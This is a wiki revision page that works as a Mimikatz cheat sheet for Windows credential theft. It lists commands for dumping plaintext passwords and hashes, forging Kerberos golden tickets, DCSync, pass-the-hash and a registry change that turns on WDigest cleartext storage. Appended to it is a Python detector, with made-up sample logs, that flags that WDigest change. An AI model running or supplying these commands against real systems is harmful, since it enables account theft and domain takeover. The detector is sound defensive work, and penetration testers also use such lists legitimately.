Mimikatz: Difference between revisions
Revision as of 22:21, 24 June 2023
Stealing plain text credentials
- privilege::debug
- sekurlsa::logonpasswords
Dump Hashes
- token::elevate
- lsadump::sam
- lsadump::lsa /patch
- lsadump::lsa /inject
- lsadump::cache
- sekurlsa::ekeys
Create a golden ticket on the domain controller
- privilege::debug
- lsadump::lsa /inject /name:krbtgt
- kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID>
- misc::cmd
Retrieve the password hashes of user accounts from a domain controller
- lsadump::dcsync /user:<USER> /domain:<DOMAIN.LOCAL>
Pass the Hash
- sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd
Wdigest - Extracting Passwords in Cleartext
- sekurlsa::wdigest
- reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
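
A defender-side check for the WDigest registry change listed above, as an added example that is not part of the original wiki page: it parses command lines taken from process-creation logs and flags `reg add` invocations that set `UseLogonCredential` to 1, including quoted paths, the long hive name and hex data. The sample events, host names and function names are constructed for illustration.

```python
import re

# Constructed (host, command line) pairs standing in for process-creation logs.
SAMPLE_EVENTS = [
    ("WS01", r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
             r" /v UseLogonCredential /t REG_DWORD /d 1"),
    ("WS02", r'"C:\Windows\System32\reg.exe" ADD "HKEY_LOCAL_MACHINE\System\CurrentControlSet'
             r'\Control\SecurityProviders\WDigest" /v uselogoncredential /t REG_DWORD /d 0x1 /f'),
    ("WS03", r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
             r" /v UseLogonCredential /t REG_DWORD /d 0 /f"),   # hardening: value back to 0
    ("WS04", r"reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
             r" /v UseLogonCredential"),                         # read-only query
    ("WS05", r"reg add HKLM\SOFTWARE\Example /v UseLogonCredential /t REG_DWORD /d 1"),
]
WDIGEST_KEY = r"system\currentcontrolset\control\securityproviders\wdigest"

def parse_reg_add(cmdline):
    """Return (key, value_name, data) for a 'reg add' command line, else None."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    lowered = [t.lower() for t in tokens]
    for i, tok in enumerate(lowered[:-2]):
        if tok.rsplit("\\", 1)[-1] in ("reg", "reg.exe") and lowered[i + 1] == "add":
            break
    else:
        return None
    rest, opts = tokens[i + 3:], {}
    for j, t in enumerate(rest[:-1]):
        if t.lower() in ("/v", "/d"):
            opts[t.lower()] = rest[j + 1]
    return tokens[i + 2], opts.get("/v"), opts.get("/d")

def enables_wdigest_cleartext(cmdline):
    """True when the command sets WDigest UseLogonCredential to 1 under HKLM."""
    key, name, data = parse_reg_add(cmdline) or (None, None, None)
    if None in (key, name, data):
        return False
    hive, _, subkey = key.lower().rstrip("\\").partition("\\")
    if (hive not in ("hklm", "hkey_local_machine") or subkey != WDIGEST_KEY
            or name.lower() != "uselogoncredential"):
        return False
    try:  # /d may be written in decimal or 0x-prefixed hex
        return (int(data, 16) if data.lower().startswith("0x") else int(data)) == 1
    except ValueError:
        return False

def flagged_hosts(events):
    return [host for host, cmd in events if enables_wdigest_cleartext(cmd)]

if __name__ == "__main__":
    print(flagged_hosts(SAMPLE_EVENTS))
```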